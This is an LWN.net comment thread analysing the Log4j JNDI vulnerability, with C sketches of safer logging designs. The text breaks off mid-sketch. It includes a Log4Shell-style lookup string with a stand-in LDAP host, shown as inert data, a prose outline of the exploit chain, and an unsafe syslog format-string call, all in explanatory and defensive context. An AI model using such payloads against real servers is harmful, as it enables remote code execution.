The Log4j mess [LWN.net]

Posted Dec 12, 2021 19:05 UTC (Sun) by alonz (subscriber, #815)

This already ruined the weekend for many folks in the industry (myself included).

Posted Dec 12, 2021 19:24 UTC (Sun) by tome (subscriber, #3171) (43 responses)

This is one of the simplest and most obvious vulnerabilities I've ever seen. To spot it one doesn't even have to read the flawed code that implements it. The Log4j documentation has everything you need to know to craft an exploit. But 'craft' is really too strong a word here, because the poison request can be sent raw, undisguised by trojan decoration. If sent to a server that logs requests with Log4j, it'll fetch code from your LDAP server and run it with the same privileges as the application server you're attacking.

It's like Denis Leary's one-liner: "Lou Gehrig died from Lou Gehrig's disease -- how did he not see that coming?"

Posted Dec 12, 2021 21:02 UTC (Sun) by roc (subscriber, #30627) (2 responses)

Given that the vulnerability is apparent once you understand the feature --- why wasn't it identified earlier? Seems like lots of people had enough information to identify the problem. Interesting food for thought.

Posted Dec 13, 2021 1:48 UTC (Mon) by Cyberax (✭ supporter ✭, #52523)

It's a low-level library that normally "just works", and people use it without giving it a second thought. It's not even similar to something like OpenSSL, because it doesn't deal with Internet-facing complicated protocols.

Posted Dec 13, 2021 5:10 UTC (Mon) by raven667 (subscriber, #5198)

The ideas behind this became well known when printf format string issues were publicized, but I saw a few references to presentations at Black Hat 2015 and 2016 that provide all the knowledge needed; someone just had to do the actual work to figure out that this applied to log message templating and publish it.

https://portswigger.net/research/server-side-template-inj...
https://www.blackhat.com/docs/us-16/materials/us-16-Munoz...

Posted Dec 12, 2021 21:34 UTC (Sun) by tialaramex (subscriber, #21167) (31 responses)

As I understand it, it's also very clumsy engineering. Log4j doesn't, even now, seem to understand the difference between the log message format and the formatted log message.

When this "feature" was still enabled by default in the library, their documentation (I looked at the Wayback Machine entry in November) seemed pretty cheerful about it, even extolling the virtues of recursive lookups since, hey, it's just a string, we can process it in a loop...

It's tempting when over-engineering something - as will inevitably happen for a second system like log4j2 was - to make everything that could possibly vary into a variable. Why not, right? But the lesson we've learned in decades of Software Engineering is that constraint is actually good - yes I want to be able to make everything a variable if I need to, including whether everything is a variable, but that should not be the default, the default should be something much less free-form, needing me to explicitly opt into ever crazier Alice-in-Wonderland APIs when and if I need them, which usually I won't.

Imagine if 99.9% of the world's log4j usage looked like log("Only this format is special", these, parameters, are, not, parsed). Since an attacker can't change constant strings like "Only this format is special" and "Username {} not present in database", lots of possible attack paths would be stopped dead.

Sure, the 0.1% of the world that actually needed log_special(all, these, parameters, are, parsed); or log_array(array_of_parameters) is in a panic to fix their code, and it is at least possible that some of this 0.1% is exposed somewhere it really shouldn't have been, but the people being exposed at least got some value for what they risked.
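A minimal C sketch of the "only the format is special" idea follows. It assumes a hypothetical log_params() taking a constant format with SLF4J-style {} placeholders and an array of string arguments; it is an illustration, not Log4j's API. Arguments are copied verbatim, so a lookup-looking string supplied by an attacker stays inert:

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical logger: only the constant format is interpreted. Each "{}"
 * is replaced by the next argument, copied verbatim; arguments are never
 * scanned for "{}", "${...}" or anything else. Output is truncated to fit. */
void log_params(char *out, size_t size, const char *fmt,
                const char *const *args, size_t nargs) {
    size_t o = 0, next = 0;
    if (size == 0) return;
    while (*fmt && o + 1 < size) {
        if (fmt[0] == '{' && fmt[1] == '}' && next < nargs) {
            /* Copy the argument as plain data. */
            for (const char *a = args[next++]; *a && o + 1 < size; a++)
                out[o++] = *a;
            fmt += 2;
        } else {
            out[o++] = *fmt++;
        }
    }
    out[o] = '\0';
}
```

Because arguments are never rescanned, the worst an attacker can do through a parameter is put odd text into the log.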

Posted Dec 12, 2021 23:33 UTC (Sun) by bartoc (guest, #124262) (30 responses)

I think you are mostly correct here. It's the same insight that Tcl has with respect to its substitution behavior (it never double expands), and the same bug that makes bash injection so easy (unless you turn off this somewhat surprising behavior by setting IFS to the empty string).

I don't think splitting things into a format string + arguments form is necessary to prevent stuff like this, though; that form just makes the problematic behavior look much more insane than it does in the "everything is one string" form.

Consider SQL injection: "SELECT ${some_variable} FROM my_table;". The problem here is not that the replacement ("${some_variable}") is inside the string instead of after it (passed as a parameter), but that there are two parsers that process the string one after another: the language's "string interpolation" parser and then the actual SQL parser. The first parser eliminates the information that "${some_variable}" is one unique "thing" that should be expanded verbatim, so the second one has no way of knowing not to parse its content as commands.

If the logging "formatter" and the string interpolation "formatter" are actually the same library, then this need not occur: the parser can just expand the replacement and do no other work. This does mean you need to say "log("${user_string}")" instead of "log(user_string)", though, so having the printf-style API may still be less error-prone (note that you do need the ability to directly parse and log runtime format specifications, because it's useful for localization).

My preference is: never double expand, and require a special opt-in for passing non-constant format specification strings.
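To illustrate "never double expand", here is a small C sketch of a single-pass interpolator. The ${name} syntax, struct binding and interpolate_once() are assumptions for illustration; the opt-in for non-constant templates is not modeled:

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* One binding: "${name}" in the template expands to value. */
struct binding {
    const char *name;
    const char *value;
};

/* Single-pass interpolation: the template is scanned once, left to right.
 * A substituted value is copied verbatim and never rescanned, so a value
 * that itself contains "${...}" stays inert. Unknown names are left as-is.
 * Returns 0 on success, -1 if the output had to be truncated. */
int interpolate_once(const char *tmpl, const struct binding *b, size_t nb,
                     char *out, size_t size) {
    size_t o = 0;
    if (size == 0) return -1;
    while (*tmpl) {
        const char *val = NULL;
        const char *end;
        size_t skip = 1;
        if (tmpl[0] == '$' && tmpl[1] == '{' &&
            (end = strchr(tmpl + 2, '}')) != NULL) {
            size_t len = (size_t)(end - (tmpl + 2));
            for (size_t i = 0; i < nb; i++) {
                if (strlen(b[i].name) == len &&
                    strncmp(b[i].name, tmpl + 2, len) == 0) {
                    val = b[i].value;
                    skip = len + 3;          /* "${" + name + "}" */
                    break;
                }
            }
        }
        if (val != NULL) {
            size_t vlen = strlen(val);
            if (o + vlen >= size) { out[o] = '\0'; return -1; }
            memcpy(out + o, val, vlen);
            o += vlen;
        } else {
            if (o + 1 >= size) { out[o] = '\0'; return -1; }
            out[o++] = *tmpl;
        }
        tmpl += skip;
    }
    out[o] = '\0';
    return 0;
}
```

With a binding user = "${jndi:ldap://evil.example/a}", the template "login ${user}" produces that text literally; nothing ever looks inside it.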

Posted Dec 13, 2021 3:23 UTC (Mon) by njs (subscriber, #40338)

> If the logging "formatter" and the string interpolation "formatter" are actually the same library then this need not occur, the parser can just expand the replacement and do no other work

I think this is exactly how this happened -- log4j uses two different pre-existing libraries to interpolate variables from the log event and to interpolate lookup keys. Since interpolation doesn't compose, they just ran them one after the other. And if they'd run them in the opposite order, they'd have mostly gotten away with it -- but whoever wrote that code didn't realize the danger, and lost the coin flip about which order to put them in.
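The coin flip can be reproduced with two toy interpolators in C. Everything here is hypothetical: toy_lookup() stands in for a lookup plugin, ${key} for the lookup syntax, and %m for the message (loosely modeled on the %m converter in Log4j's pattern layout). Only the order of the two passes differs:

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Stand-in for a lookup plugin: counts calls and returns a placeholder. */
static int lookups_performed = 0;

static const char *toy_lookup(const char *key, size_t len) {
    (void)key;
    (void)len;
    lookups_performed++;
    return "<looked-up>";
}

/* Lookup pass: replace every "${key}" in `in` with toy_lookup(key).
 * size must be > 0. */
static void expand_lookups(const char *in, char *out, size_t size) {
    size_t o = 0;
    const char *end;
    while (*in && o + 1 < size) {
        if (in[0] == '$' && in[1] == '{' && (end = strchr(in + 2, '}')) != NULL) {
            const char *val = toy_lookup(in + 2, (size_t)(end - (in + 2)));
            while (*val && o + 1 < size) out[o++] = *val++;
            in = end + 1;
        } else {
            out[o++] = *in++;
        }
    }
    out[o] = '\0';
}

/* Message pass: replace every "%m" in `pattern` with the message, verbatim.
 * size must be > 0. */
static void insert_message(const char *pattern, const char *msg, char *out, size_t size) {
    size_t o = 0;
    while (*pattern && o + 1 < size) {
        if (pattern[0] == '%' && pattern[1] == 'm') {
            for (const char *m = msg; *m && o + 1 < size; m++) out[o++] = *m;
            pattern += 2;
        } else {
            out[o++] = *pattern++;
        }
    }
    out[o] = '\0';
}

/* Unlucky order: the message is inserted first, then the whole line is
 * scanned for lookups, so attacker text inside the message is expanded. */
void format_unlucky(const char *pattern, const char *msg, char *out, size_t size) {
    char tmp[256];
    insert_message(pattern, msg, tmp, sizeof tmp);
    expand_lookups(tmp, out, size);
}

/* Lucky order: lookups are expanded in the operator's pattern only; the
 * message is inserted afterwards and never rescanned for "${". */
void format_lucky(const char *pattern, const char *msg, char *out, size_t size) {
    char tmp[256];
    expand_lookups(pattern, tmp, sizeof tmp);
    insert_message(tmp, msg, out, size);
}
```

Even the lucky order is only "mostly" safe: if a lookup result itself contained %m, the second pass would still rewrite it.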

Posted Dec 13, 2021 4:47 UTC (Mon) by rlhamil (guest, #6472) (3 responses)

Yes! If something is subjected to two or more different parsings, there's the possibility of supplying a parameter or input that takes advantage of that.

That's one reason I double quote just about every shell variable substitution (even if I'm pretty sure it can't matter), and think very carefully about what "eval" might do. :-)

Posted Dec 13, 2021 6:29 UTC (Mon) by bartoc (guest, #124262) (2 responses)

Just start your script with:

IFS=

It removes the word-splitting “feature” completely.

Posted Dec 13, 2021 9:32 UTC (Mon) by NYKevin (subscriber, #129325) (1 responses)

Doesn't bash still do globbing even if IFS is empty? So setting IFS= is not going to save you from variables containing stars or question marks... which means you have to use double quotes everywhere *anyway*, which means you don't need to bother clearing IFS.

Posted Dec 13, 2021 23:24 UTC (Mon) by sjj (guest, #2020)

I've used this as the first code line.

set -efu -o pipefail

Posted Dec 13, 2021 9:49 UTC (Mon) by NYKevin (subscriber, #129325) (24 responses)

I would go further. The entire feature is ill-conceived and never should have been added, even with proper parsing discipline. Think about it: You're a *logging library*. Your job is to consume strings and push them into a file or networked logging service. If you want to let the client customize some aspect of how those strings are processed or formatted, the obvious way to do that is using the template method pattern, or something reasonably like the template method pattern. There is no universe in which it makes sense to try and parse URIs out of the strings and load arbitrary code over the network, just so the client can avoid having to write a tiny amount of glue code (for which you could easily provide convenience functions etc., if necessary).

Normally, I wouldn't be this blunt about it, but c'mon, people, the template method pattern was in the Gang of Four book in 1994. It's one of the most commonly used, well-understood design patterns in existence, to the point that some people wouldn't even call it a design pattern because it's "too obvious." This is in no way a difficult problem to solve, and I find it baffling that anybody reached for JNDI and LDAP to do so.
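For comparison, the template method pattern is easy to express even in C with a function pointer. This is a sketch with hypothetical names (struct logger, logger_emit(), decorate): the library owns the sequence of steps, the client overrides one step, and the message is treated as data throughout.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

struct logger;

/* The overridable step: may append client-specific context to the line. */
typedef void (*decorate_fn)(const struct logger *self, char *line, size_t size);

struct logger {
    decorate_fn decorate;   /* NULL means "use the default step" */
    char last_line[256];    /* stands in for the file or network sink */
};

/* Default step: add nothing. */
static void no_decoration(const struct logger *self, char *line, size_t size) {
    (void)self;
    (void)line;
    (void)size;
}

/* The template method: the library owns the order of the steps, and the
 * message is copied as data, never parsed for lookups. */
void logger_emit(struct logger *lg, const char *level, const char *msg) {
    char line[256];
    snprintf(line, sizeof line, "%s: %s", level, msg);
    decorate_fn step = lg->decorate ? lg->decorate : no_decoration;
    step(lg, line, sizeof line);
    snprintf(lg->last_line, sizeof lg->last_line, "%s", line);
}

/* A client override: append a request id from the client's own state. */
static const char *current_request_id = "req-7";

static void add_request_id(const struct logger *self, char *line, size_t size) {
    size_t len = strlen(line);
    (void)self;
    snprintf(line + len, size - len, " [%s]", current_request_id);
}
```

The client gets its extra context with a few lines of glue code, and nothing in the message can reach the hook's logic.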

Posted Dec 13, 2021 11:15 UTC (Mon) by k3ninho (subscriber, #50375) (2 responses)

>[S]ome people wouldn't even call it a design pattern because it's "too obvious."

From the test side, 'obvious' is one of my trigger words. 'Should' is considered harmful; common sense is not so common.

It is worth making a habit of overstating safe and diligent behaviour, here calling out the options for logging: don't consume user/attacker input without putting it in a security zone; don't call out to the network without knowing what you're calling out to the network for; build your string before publishing it; ideally only use printf-type string substitution when logging. You don't need recursive descent or a state machine, and it's a security hole waiting to happen if your logger is functionally a Turing-complete domain-specific language.

On top, I think we ought to look at the wider culture around Enterprise Java (as I understand it) that uses a lot of instantaneous point-of-use anonymous functions in the Java 8 streams modality. This means programmers are trained away from instantiating and using items outside an anonymous lambda on composed object methods, so being able to log some data might just in-line process user-/attacker-supplied input.

K3n.

Posted Dec 13, 2021 15:41 UTC (Mon) by NYKevin (subscriber, #129325) (1 responses)

> On top, I think we ought to look at the wider culture around Enterprise Java (as I understand it) that uses a lot of instantaneous point-of-use anonymous functions in the Java 8 streams modality. This means programmers are trained away from instantiating and using items outside an anonymous lambda on composed object methods, so being able to log some data might just in-line process user-/attacker-supplied input.

In other words: Java (or "Enterprise Java" if you prefer) has successfully ship-of-Theseus'd itself into a language whose programmers don't know OOP. That's a startling outcome of this whole streams business, when you consider that Java was originally designed to force programmers to use OOP whether they like it or not.

Posted Dec 13, 2021 21:42 UTC (Mon) by khim (subscriber, #9252)

> when you consider that Java was originally designed to force programmers to use OOP whether they like it or not.

This may have been the original intent, but Java eventually became a language whose true strength lies in the ability to use programmers who don't know anything about OOP, or even programming in general, and who program by copy-pasting snippets from Stack Overflow randomly till tests pass.

Of course, when the language started adding features that are easy to abuse, that fact became exposed.

But it's not as if Java programmers understood what they were doing, and why, before the introduction of Streams.

Posted Dec 13, 2021 11:42 UTC (Mon) by Cyberax (✭ supporter ✭, #52523) (7 responses)

The problem is that people involved hadn't understood that connecting two seemingly unrelated features might result in a disaster.

First, the JNDI lookup causing class loading is fine; it's typically used in enterprise networks to connect clients to an application server (typically over a trusted network) or to do service discovery within the application environment. These days we would think about a man-in-the-middle pretending to be the app server and injecting a malicious payload, but people were not considering this back then.

Second is using JNDI lookups in the format string. Format strings are typically not controlled by attackers and there's no reason for the library author to be too concerned about supporting JNDI.

And the third is using that with raw log messages.

A typical Swiss cheese model of a disaster.

Posted Dec 13, 2021 17:23 UTC (Mon) by NYKevin (subscriber, #129325) (6 responses)

> Second is using JNDI lookups in the format string. Format strings are typically not controlled by attackers and there's no reason for the library author to be too concerned about supporting JNDI.

Sure, but the client could do that themselves. For example (and I'm just making this syntax up, it could obviously be more elaborate if necessary), Log4j could say "If the format string contains a substring of the form {custom:foo}, we will call the formatCustomReference() method [or whatever they decide to name it] and pass the string 'foo' as the only argument, then replace {custom:foo} with whatever that method returns." Then, *if you want JNDI lookups*, you override the method with code that does a JNDI lookup (or call their convenience method/use their pre-written class which does that for you). If you don't want JNDI lookups, you don't override XYZ, and the default implementation either returns the string unchanged, or throws.

My argument here is that the vast majority of the time, you don't actually need to do arbitrary class lookups at runtime. Often, you just want some random little bit of state that happens to be inconvenient to pass directly into the logging call... so you can pull it out of some kind of context class or something like that. JNDI is basically reflection, and it should be a last resort, not the default way of solving the "I need to run some code" problem.
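A C sketch of that opt-in hook, using the made-up {custom:foo} syntax from the comment plus an assumed {msg} marker for the message. custom_resolver, format_line() and resolve_tenant() are hypothetical. With no resolver installed the reference is left unchanged, and the message is never scanned:

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical hook: receives the text after "{custom:" and writes the
 * replacement into out. */
typedef void (*custom_resolver)(const char *key, size_t key_len,
                                char *out, size_t size);

/* Default behaviour: no lookup at all, the reference is left unchanged. */
static void leave_unchanged(const char *key, size_t key_len, char *out, size_t size) {
    snprintf(out, size, "{custom:%.*s}", (int)key_len, key);
}

/* Expands {custom:KEY} in the operator-supplied format only. The message
 * is inserted verbatim wherever the format says {msg} and is never scanned. */
void format_line(const char *fmt, const char *msg, custom_resolver resolve,
                 char *out, size_t size) {
    static const char tag[] = "{custom:";
    const size_t tag_len = sizeof tag - 1;
    size_t o = 0;
    if (size == 0) return;
    if (resolve == NULL) resolve = leave_unchanged;
    while (*fmt && o + 1 < size) {
        char piece[128];
        const char *src = NULL;
        const char *end;
        size_t skip = 1;
        if (strncmp(fmt, "{msg}", 5) == 0) {
            src = msg;
            skip = 5;
        } else if (strncmp(fmt, tag, tag_len) == 0 &&
                   (end = strchr(fmt + tag_len, '}')) != NULL) {
            size_t key_len = (size_t)(end - fmt) - tag_len;
            resolve(fmt + tag_len, key_len, piece, sizeof piece);
            src = piece;
            skip = (size_t)(end - fmt) + 1;
        }
        if (src != NULL) {
            while (*src && o + 1 < size) out[o++] = *src++;
        } else {
            out[o++] = *fmt;
        }
        fmt += skip;
    }
    out[o] = '\0';
}

/* Example client resolver: knows a single key, "tenant". */
static void resolve_tenant(const char *key, size_t key_len, char *out, size_t size) {
    if (key_len == 6 && strncmp(key, "tenant", 6) == 0)
        snprintf(out, size, "%s", "acme");
    else
        snprintf(out, size, "%s", "?");
}
```

A resolver that does a JNDI lookup would plug in the same way, but only for clients that explicitly ask for it.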

Posted Dec 13, 2021 19:05 UTC (Mon) by NYKevin (subscriber, #129325)

> you don't override XYZ

s/XYZ/formatCustomReference/

Posted Dec 13, 2021 22:14 UTC (Mon) by Cyberax (✭ supporter ✭, #52523) (3 responses)

That's pretty much what happened. Except that the JNDI lookup code was added to the default set of plugins.

Here's the patch: https://issues.apache.org/jira/secure/attachment/12592850... - note the plugin set in the beginning.

> My argument here is that the vast majority of the time, you don't actually need to do arbitrary class lookups at runtime.

There's no arbitrary lookup at runtime. E.g. you can't do something like "${nodejs:script}" and expect the JVM to dynamically class-load NodeJS.

The problem is in the JNDI implementation: it can be used to load arbitrary code. This is arguably a bad design in the first place, though.

Posted Dec 14, 2021 3:27 UTC (Tue) by rodgerd (guest, #58896)

Time to bust this baby out again: https://www.youtube.com/watch?v=kjZHjvrAS74

Posted Dec 14, 2021 8:12 UTC (Tue) by NYKevin (subscriber, #129325) (1 responses)

> There's no arbitrary lookup at runtime.

To my understanding, the way this CVE has been publicly described is (roughly) as follows:

0. A vulnerable implementation logs a user-provided string.
1. The string contains a URI.
2. Log4j uses some JNDI and LDAP magic to convert this URI into a Class<T> object, or something which at least vaguely resembles a Class<T> object. In so doing, it downloads the class definition from an attacker-controlled server.
3. Log4j then uses reflection to call some method on that Class<T> (or whatever it is), which causes attacker-controlled code to be executed.

I call step (2) "arbitrary class lookups at runtime." What do you call it, or is my understanding of this security vulnerability completely incorrect?

Posted Dec 14, 2021 8:26 UTC (Tue) by Cyberax (✭ supporter ✭, #52523)

> 2. Log4j uses some JNDI and LDAP magic to convert this URI into a Class<T> object, or something which at least vaguely resembles a Class<T> object. In so doing, it downloads the class definition from an attacker-controlled server.

Close. LDAP in Java has support for class loading, which was earlier (in the time of Java 1.2!) used to load type information data for things like custom exceptions or custom types. Doc: https://docs.oracle.com/en/middleware/idm/internet-direct...

LDAP is not the only vector that can be used to exploit this. RMI (Remote Method Invocation) is just as potent but is a bit harder to set up.

> 3. Log4j then uses reflection to call some method on that Class<T> (or whatever it is), which causes attacker-controlled code to be executed.

It actually doesn't use it for anything, but simply loading the class is enough (static initializers can run arbitrary code).

Posted Dec 14, 2021 10:11 UTC (Tue) by smurf (subscriber, #17840)

> Sure, but the client could do that themselves.

But that would … umm … require actual coding?

Given that Java devolved into a language of which 90% (personal and admittedly biased impression) consists of mostly-copied-from-stackoverflow boilerplate for iterator classes and instance-building classes and whatnot *plus* its own built-in scripting language (it's too difficult to hook anything sane into the JVM, so …), most Java coders won't be able to get that right.

So instead of a sane approach, which would have required an entirely new heap of class scaffolding just for the ability to pass a look-something-up object to the logger, they opted to do string interpolation. Of random data from outside. Patently stupid, but let's face it: the first step towards a _really_ sane solution involves "use a sensible language dammit".

Posted Dec 13, 2021 16:14 UTC (Mon) by epa (subscriber, #39769) (12 responses)

It's a characteristic weakness of open source, community-driven projects to make everything customizable, configurable, and dynamic. And this episode shows one advantage of crusty, rule-bound standards committees. If you have to write a formal specification of the behaviour, so that a new implementation could be written to the spec, design flaws become clearer. "First the following patterns in the string are expanded. Then the result of that expansion is taken as a new string to be expanded, using these different patterns... oh hang on..."

Posted Dec 13, 2021 22:27 UTC (Mon) by bartoc (guest, #124262) (11 responses)

I’m a C++ library implementer, so implementing these kinds of standards is my job.

They do become clearer, I guess, but many bugs still don't show up until you have actually gone to write the first implementation. A technical standard with zero implementations is a very different beast from one with one implementation, and that's different from one with multiple independent implementations.

There's a reason the C++ committee likes to standardize existing libraries, and even then the resulting specification usually contains many bugs found only during implementation.

In any event I think going to a formal standardization model would be a very expensive way to resolve this, and if nobody else is going to implement the thing then you could just as well spend the time writing documentation for the current behavior (which is what a standard with one implementation written after the fact by that implementations authors is going to be in any case). Improving the documentation outside any formal process is probably better bang for the buck.

Maybe Knuth had a point with his whole “literate programming” thing after all :)

Posted Dec 14, 2021 13:23 UTC (Tue) by khim (subscriber, #9252) (10 responses)

> Maybe Knuth had a point with his whole “literate programming” thing after all :)

Wouldn't work. It's slow, but, more importantly, for it to work you need someone who can write both good code and good documentation.

It's hard enough to find someone who can do a good job at one of these things. But to find someone who can do these two different things? Simultaneously?

Sorry, but we need more than one coder per thousand (or ten thousand?) people.

Posted Dec 14, 2021 13:52 UTC (Tue) by mathstuf (subscriber, #69389) (9 responses)

> Sorry, we need more than one coder per thousand (or ten thousand?) of people.

Hmm. This certainly warrants a citation. If you're referring to "societal demand" kind of "need", sure. But I'm not sure that turns into anything other than "the market will fulfill demand" with the normal head-in-the-sand behaviors to externalities if there's not some kind of guiding regulation (IMO, another "societal demand" kind of "need").

Posted Dec 14, 2021 15:28 UTC (Tue) by khim (subscriber, #9252) (8 responses)

Various estimates put the number of software engineers in the US somewhere between 2 million and 4 million.

That's around 1% of the population. Which means that the 5% who can naturally grasp the required knowledge is, probably, enough: if ¼ or ⅕ of them picked software engineering as their life goal, we would have about 1% of the population. But if we take 5% of that 5% (by adding the requirement to be proficient in another, significantly different area), we arrive at around 0.25%, which is significantly lower than 1%. And some of them may want to do something other than programming, you know.
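Spelling out the arithmetic, assuming (as the comment appears to) that aptitude for the two skills is independent and that about a fifth of those with the aptitude go into software:

```latex
\begin{aligned}
0.05 \times \tfrac{1}{5} &= 0.01 = 1\% && \text{one skill required}\\
0.05 \times 0.05 &= 0.0025 = 0.25\% && \text{both skills required}\\
0.0025 \times \tfrac{1}{5} &= 0.0005 = 0.05\% && \text{both skills, a fifth of whom choose software}
\end{aligned}
```

The last line appears to be where the 0.05% figure mentioned at the end of this comment comes from.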

IOW: there is no excuse for the bazillions of Java programmers who copy-paste code from StackOverflow without understanding what they are doing, but asking programmers to learn to write good literature on top of writing good code would be too much.

Maybe we could organize things differently, and then 0.05% of the population would be enough… but that would require an entirely different organization of society, and we have no idea if such a society is possible at all.

Posted Dec 16, 2021 18:49 UTC (Thu) by fest3er (guest, #60379) (7 responses)

Alas, coders, programmers and software engineers will never produce quality documentation until teachers/instructors/professors learn to teach natural languages (English, Korean, Chinese, Russian, Italian, Bantu, et alia) as *programming* languages. Because that is what they are. Consider: as I type this response, I am attempting to code a program that, when you later read it, will program *your* neural nets to think what I am thinking.

I see little reason for any software engineer to be unable to code good, clear documentation. Programming is programming; natural languages and computer languages all demand rigorous attention to details in order to avoid errors. In short, if you can write well using computer languages, you should be able to learn to write well using English (as most programming languages use English) and your native language if it is not English, and you should be able to learn another natural language without too much difficulty.

All languages are programming languages and should be taught as such. But I digress.

Posted Dec 16, 2021 19:11 UTC (Thu) by khim (subscriber, #9252)

Similarity between programming languages and natural languages is quite real but irrelevant.

“Programming” humans and programming computers are two radically different skill sets. That's why good managers are rarely good programmers and good programmers are rarely good managers.

The difference lies not in the languages used, but in the difference between computers and humans. And that one is huge.

Humans have common sense, yet they can't keep even a dozen entities in mind at once. Computers have no common sense, but can easily deal with millions and billions of entities.

This makes the art of making a computer do what you need radically different from doing the same with a human. With a computer there is no need to persuade anyone to do anything or keep anyone engaged or interested, but you have to handle corner cases or else you will be in trouble. With humans you can rely on the fact that most corner cases will be noticed and fixed automatically, but you need to somehow convince someone to accept your “program”.

Consider lawyers (who are, arguably, the closest thing to “human programmers”) versus programmers. What does a programmer do when faced with the need to verify a program? Test corner cases first. If the program works fine there, then chances are high it will work fine everywhere. What does a lawyer do when faced with the need to interpret the law? Try to move as far from corner cases as possible: you can never be sure how a judge will interpret corner cases, so spending time on them is pointless; better to look for a way to resolve the case without touching any corner cases, even remotely.

And trying to use a human language like a programming language (following the DRY principle, avoiding text duplication, and so on) is the best way to create something which no one, not even another programmer, will be able to understand.

Because with computers you try to avoid duplication, but for human-readable text it's important to do just the opposite: talk about the same thing from many different angles in the hope that the reader will be able to understand and accept at least one of them.

Posted Jan 14, 2022 16:18 UTC (Fri) by nix (subscriber, #2304) (5 responses)

> In short, if you can write well using computer languages, you should be able to learn to write well using English (as most programming languages use English) and your native language if it is not English, and you should be able to learn another natural language without too much difficulty

Oh yes, because natural languages and computer languages have exactly the same level of complexity. Oh wait no, natural languages are orders of magnitude more complex and vary along many more dimensions, with much less obvious internal coherence (the only actual rule is "must be an attractor in the space of languages instantiated by the learning systems in toddlers' heads when iterated for many generations", and nobody even knows how those incredible pieces of neural machinery work or what they do, or even the space of languages they could in theory produce or the dimensions along which those languages might vary). This couldn't be more different from how computer languages are designed. Really, most computer languages are so similar to each other (compared to the variability we see in natural languages) that it would be close to the truth to call them all very strange, restricted dialects of (mostly) English.

Everyone who is neurologically normal can learn at least one spoken language in the critical window in childhood. Not everyone can learn more outside that time, no matter how hard they try, and even those who do are very rarely as good at it as native speakers who learned in that window. And computer languages are textual, and that's not a language at all: it's a technological *encoding* of a language. Languages are spoken things (or, for the deaf, serially-visually-encoded things quite unlike any form of writing, processed using astonishingly similar machinery to the machinery used to process auditory language, often ending up using the exact same brain regions, repurposed bits of auditory cortex!). There is no spoken form of any computer language I am aware of: IMHO this alone is enough to disqualify them all as being remotely similar to natural languages.

Posted Jan 14, 2022 16:36 UTC (Fri) by Wol (subscriber, #4433) (4 responses)

Bear in mind languages re-program the brain. Someone else has already mentioned tonal languages.

But even just French and English - French has a bunch of rules about where and how to stress the syllables. English doesn't. So as an English speaker when somebody talks to me with a different stress pattern I take it in my stride. But if I spoke French with an English stress pattern, a Frenchman would find it much harder to understand than if I spoke with a French stress pattern, despite being the EXACT SAME syllables (or rather not, as consonants migrate freely between English syllables).

If your brain is programmed to recognise one class of languages, it is very difficult to be competent in a different class. And even multi-lingual kids - a study of children with one French and one English parent found that all the kids fell on one side or the other of this divide, and it clearly affected their choice of favourite language, even if they were perfect in the other.

Cheers,
Wol

Posted Jan 14, 2022 16:48 UTC (Fri) by nix (subscriber, #2304) (2 responses)

> But even just French and English - French has a bunch of rules about where and how to stress the syllables. English doesn't.

Yes it does. It just has different rules (it's incredibly hard to understand mis-stressed English and sometimes it can be incomprehensible or change the meaning entirely, just as in French). What English has mostly lost is the need for endings of, well, almost anything but pronouns to agree in number, case etc (an ancient feature present in almost all other PIE-descended languages).

Posted Jan 14, 2022 21:40 UTC (Fri) by Wol (subscriber, #4433) (1 responses)

That's fine until you get conflicting rules in different dialects. I've just got used to it ...

And then you get wonders like "how do you pronounce Gillingham?" Where the correct answer is "What county are you in?". I pronounce it Jillingham, which is the grammatically correct way? The i softens the g? The way of the Men of Kent? (No, Kentish Men don't live in Gillingham.)

And then I went to Somerset, where they pronounce it G'illingham, like Google Maps. Very confusing :-)

My daughter's now a Yorkshire lass with Geordie in-laws. That gets well weird ...

Give up. English is a STRANGE language (and that's *before* the Americans started messing with it :-)

Cheers,
Wol

Posted Jan 15, 2022 1:45 UTC (Sat) by mathstuf (subscriber, #69389)

> I pronounce it Jillingham, which is the gramatically correct way? The i softens the g?

I don't think that's any hard and fast rule. Take "gill" (as in fish breathing organs) for example. I'm American, but I'd pronounce that with a hard "g" without any other guidance.

Posted Jan 14, 2022 17:24 UTC (Fri) by mathstuf (subscriber, #69389)

> Bear in mind languages re-program the brain.

I don't believe the Sapir-Whorf hypothesis has been proven enough to state it with such conviction. At least this sounds like the strong version (whereas the weaker version where it merely *influences* is much better supported).

> Someone else has already mentioned tonal languages.

English has tones. Not in the same way as Chinese or Telugu, but it's there. Just as an example, verbal sarcasm is (usually) expressed through tonality. Take "yeah, right" (agreement) and "yeah…right" (doubt) when said verbally. The only difference is tone and timing. English also has tones associated with questions and interrogatory statements (try asking questions flatly or adding a rising tone to the end of sentences). The tonality is more on the level of sentences rather than on syllables, but I don't think anyone can say with conviction that English is completely atonal and that tone is therefore completely alien to English speakers. It's just used differently (with a higher level of importance).

FWIW, Hindi has aspiration on basically every consonant sound which makes it different (and therefore changes the word). It is *very* hard for me to make some of them as it just doesn't feel natural and I feel like I'm making a separate "h" sound, but I (think I) am getting better at hearing them. I suspect it is similar for the English l/r distinction that is difficult for native speakers of some languages. Rolling or trilling r sounds is also something I have just not been able to master either. Tones in other languages feel more like this to me than something impossible.

The Log4j mess

Posted Dec 13, 2021 8:24 UTC (Mon) by Lawless-M (guest, #155377) [Link]

Yeah, I just read how it works, and my reaction was "were the people who thought of this feature 'mental'?"

The Log4j mess

Posted Dec 14, 2021 13:52 UTC (Tue) by dskoll (subscriber, #1630) [Link] (6 responses)

Yes, it was a real WTF of a design error. Even venerable old syslog(3) has been abused due to the naivety of programmers who write:

syslog(LOG_INFO, attacker_controlled_msg);

instead of:

syslog(LOG_INFO, "%s", attacker_controlled_msg);

If I could go back in time, I'd redesign syslog(3) to take only a single string argument that is logged verbatim, and add a new syslogf(3) function that implements the formatted version.
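A minimal sketch of that split, using hypothetical names `log_line` (verbatim) and `log_linef` (formatted) and writing into a caller-supplied buffer as a stand-in for the real syslog(3) call, so the behavior is easy to see. The `format(printf, 3, 4)` attribute is a GCC/Clang extension; with it, `-Wformat-security` warns about a call like `log_linef(buf, n, msg)` whose format is a non-literal with no arguments.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical verbatim logger: msg is copied as-is and never parsed as a
 * format string, so "%n" or "%s" in attacker input is harmless. Output is
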